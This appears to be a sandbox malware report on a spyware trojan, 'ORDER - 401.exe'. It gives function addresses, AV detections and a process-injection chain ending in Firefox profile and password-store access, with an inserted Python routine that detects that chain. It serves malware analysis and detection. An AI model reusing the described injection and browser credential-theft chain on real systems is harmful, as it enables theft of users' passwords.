                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DEE265_2_010DEE26
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020E595_2_01020E59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032E905_2_01032E90
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DCE935_2_010DCE93
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DEEDB5_2_010DEEDB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010EB16B5_2_010EB16B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105516C5_2_0105516C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100F1725_2_0100F172
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102B1B05_2_0102B1B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CF0CC5_2_010CF0CC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010270C05_2_010270C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D70E95_2_010D70E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DF0E05_2_010DF0E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D132D5_2_010D132D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100D34C5_2_0100D34C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0106739A5_2_0106739A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010252A05_2_010252A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103B2C05_2_0103B2C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C12ED5_2_010C12ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D75715_2_010D7571
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BD5B05_2_010BD5B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DF43F5_2_010DF43F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010114605_2_01011460
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DF7B05_2_010DF7B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D16CC5_2_010D16CC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B59105_2_010B5910
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010299505_2_01029950
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103B9505_2_0103B950
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108D8005_2_0108D800
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010238E05_2_010238E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFB765_2_010DFB76
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103FB805_2_0103FB80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01095BF05_2_01095BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105DBF95_2_0105DBF9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFA495_2_010DFA49
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D7A465_2_010D7A46
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01093A6C5_2_01093A6C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01065AA05_2_01065AA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BDAAC5_2_010BDAAC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C1AA35_2_010C1AA3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CDAC65_2_010CDAC6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01023D405_2_01023D40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D1D5A5_2_010D1D5A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D7D735_2_010D7D73
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103FDC05_2_0103FDC0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01099C325_2_01099C32
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFCF25_2_010DFCF2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFF095_2_010DFF09
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01021F925_2_01021F92
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFFB15_2_010DFFB1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01029EB05_2_01029EB0
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D2A487_2_027D2A48
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D2A3C7_2_027D2A3C
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DB0787_2_027DB078
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DB0317_2_027DB031
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D28F87_2_027D28F8
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D49187_2_027D4918
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DCE147_2_027DCE14
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D46F87_2_027D46F8
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D46F07_2_027D46F0
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027F34D87_2_027F34D8
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04384420
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04392446
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0438E4F6
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E0535
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043A0591
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042FC6E0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E0770
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04304750
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042DC7C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04372000
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042D0100
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0437A118
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04368158
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043A01AA
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043941A2
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043981CC
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04380274
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043602C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439A352
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043A03E6
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042EE3F0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E0C00
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04380CB5
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042D0CF2
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0437CD1F
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042EAD00
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042F8DBF
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042DADE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439EE26
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E0E59
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439CE93
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042F2E90
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439EEDB
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04300F30
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04382F30
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04322F28
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04354F40
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0435EFA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042ECFE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042D2FC8
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E480D
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E2840
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042EA840
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042C68B8
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0430E8F0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042F6962
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E29A0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043AA9A6
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042DEA80
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439AB40
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04396BD7
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439F43F
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042D1460
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04397571
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0437D5B0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043A95C3
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04325630
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043916CC
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439F7B0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043970E9
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439F0E0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E70C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0438F0CC
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043AB16B
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0431516C
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042CF172
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042EB1B0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E52A0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043812ED
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042FB2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439132D
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042CD34C
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0432739A
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04359C32
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439FCF2
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04397D73
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04391D5A
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E3D40
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042FFDC0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E9EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439FF09
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439FFB1
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E1F92
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0434D800
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E38E0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04375910
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042E9950
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042FB950
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04353A6C
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439FA49
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04397A46
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04325AA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0437DAAC
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04381AA3
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0438DAC6
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0439FB76
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_042FFB80
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04355BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_0431DBF9
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001B2390
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001CC0A0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001AD2B8
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001AD2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001AB4C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001AD4E0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001AB610
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001AB604
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001B5A40
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001B3BF9
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001B3C40
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_045FE443
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_045FE7E1
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_045FE328
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_045FD8A8
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_045FCB63
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: String function: 0435F290 appears 105 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: String function: 04327E54 appears 111 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: String function: 042CB970 appears 280 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: String function: 04315130 appears 58 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: String function: 0434EA12 appears 86 times
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: String function: 01067E54 appears 101 times
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: String function: 0108EA12 appears 86 times
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: String function: 0100B970 appears 264 times
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: String function: 01055130 appears 58 times
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: String function: 0109F290 appears 105 times
                Source: ORDER - 401.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: ORDER - 401.exe, 00000000.00000002.2291861064.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000002.2297029541.0000000007110000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000002.2296779398.0000000006FF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000000.2207952979.00000000002CE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameerzH.exe4 vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000002.2292905920.0000000002597000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000005.00000002.2477842446.000000000110D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIEUNATT.EXED vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIEUNATT.EXED vs ORDER - 401.exe
                Source: ORDER - 401.exe | Binary or memory string: OriginalFilenameerzH.exe4 vs ORDER - 401.exe
                Source: ORDER - 401.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ORDER - 401.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HtyuSpR3Ls9Z4EJjgG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HtyuSpR3Ls9Z4EJjgG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/2@16/13
                Source: C:\Users\user\Desktop\ORDER - 401.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER - 401.exe.log
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\ieUnatt.exe | File created: C:\Users\user\AppData\Local\Temp\086604I_P
                Source: ORDER - 401.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002655000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4676389465.00000000026AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2661202577.00000000026AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2661202577.0000000002676000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4676389465.0000000002676000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2659256243.000000000268A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2659343185.0000000002676000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORDER - 401.exe | Virustotal: Detection: 77%
                Source: ORDER - 401.exe | ReversingLabs: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Process created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Process created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Process created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
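The process rows above are the part of this report a detection engineer would turn into a rule: the sample re-executes itself three times, the dropped ZaZCnGdXtY.exe under a random-named Program Files (x86) directory starts the Windows binary ieUnatt.exe from SysWOW64, and ieUnatt.exe then launches firefox.exe, which goes on to read the Firefox profiles.ini. The function-address rows earlier in the section agree with that chain: every 8_2 address listed for ieUnatt.exe is the corresponding 5_2 address in ORDER - 401.exe plus 0x032C0000 (5_2_01020535 and 8_2_042E0535, 5_2_01044750 and 8_2_04304750, and the string functions 0100B970 and 042CB970), so the same payload is mapped into both processes. The following is an added example and not part of the Joe Sandbox report: a small Python triage routine run over process-creation records constructed from the rows above. The ProcEvent record shape, the random-name heuristic, and the browser and benign-launcher name lists are assumptions for illustration, not fields or lists from the report.

```python
"""Process-chain triage for the injection pattern in the report's process rows.

Added example, not Joe Sandbox code. EVENTS is constructed from the report's
"Process created" rows; the record shape, the random-name heuristic and the
browser / benign-launcher lists are assumptions for illustration.
"""
from __future__ import annotations

import ntpath
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (assumed shape): parent image and child image."""
    parent: str | None  # None for the root of the tree ("unknown" in the report)
    image: str


# Constructed from the report's "Process created" rows. The rows carry no PIDs,
# so the chain is keyed on image paths.
SAMPLE = r"C:\Users\user\Desktop\ORDER - 401.exe"
DROPPED = (r"C:\Program Files (x86)"
           r"\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe")
IEUNATT = r"C:\Windows\SysWOW64\ieUnatt.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

EVENTS = [
    ProcEvent(None, SAMPLE),
    ProcEvent(SAMPLE, SAMPLE),
    ProcEvent(SAMPLE, SAMPLE),
    ProcEvent(SAMPLE, SAMPLE),
    ProcEvent(DROPPED, IEUNATT),
    ProcEvent(IEUNATT, FIREFOX),
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# System-directory parents that start browsers in normal use (assumed list).
BENIGN_LAUNCHERS = {"explorer.exe", "cmd.exe", "powershell.exe", "svchost.exe", "runtimebroker.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def random_looking(component: str, min_len: int = 16) -> bool:
    """Heuristic (assumption): a long, ASCII-letters-only, mixed-case path component
    with no spaces, dots or digits is unlikely to be a vendor-chosen name."""
    return (len(component) >= min_len and component.isascii() and component.isalpha()
            and not component.islower() and not component.isupper())


def has_random_component(path: str) -> bool:
    return any(random_looking(part) for part in path.split("\\"))


def triage(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (rule, detail) pairs for the three chain anomalies visible in the report."""
    findings: list[tuple[str, str]] = []

    # 1. An image that starts an identical copy of itself, the usual shape of a
    #    loader that creates a child and then replaces the child's memory.
    self_spawns = Counter(image_name(e.image) for e in events
                          if e.parent is not None and e.parent.lower() == e.image.lower())
    for name, count in self_spawns.items():
        findings.append(("self_spawn", f"{name} re-executed itself {count} times"))

    for e in events:
        if e.parent is None:
            continue
        parent_name, child_name = image_name(e.parent), image_name(e.image)

        # 2. A System32/SysWOW64 binary started by a parent that lives under a
        #    random-looking directory outside the system directories.
        if in_system_dir(e.image) and not in_system_dir(e.parent) and has_random_component(e.parent):
            findings.append(("system_binary_from_random_path", f"{child_name} started by {e.parent}"))

        # 3. A system binary that is not an interactive shell launching a browser,
        #    which in this report precedes the read of Firefox's profiles.ini.
        if child_name in BROWSERS and in_system_dir(e.parent) and parent_name not in BENIGN_LAUNCHERS:
            findings.append(("browser_from_system_binary", f"{parent_name} launched {child_name}"))

    return findings


if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"[{rule}] {detail}")
```

Run against the constructed EVENTS the routine returns one finding per rule, and returns nothing for a chain in which explorer.exe or cmd.exe starts the browser. In a real deployment the same three conditions map onto Sysmon event ID 1 (ParentImage and Image), and rule 1 should additionally require the child to have been created suspended, which the process rows here cannot show.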
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: cryptbase.dll
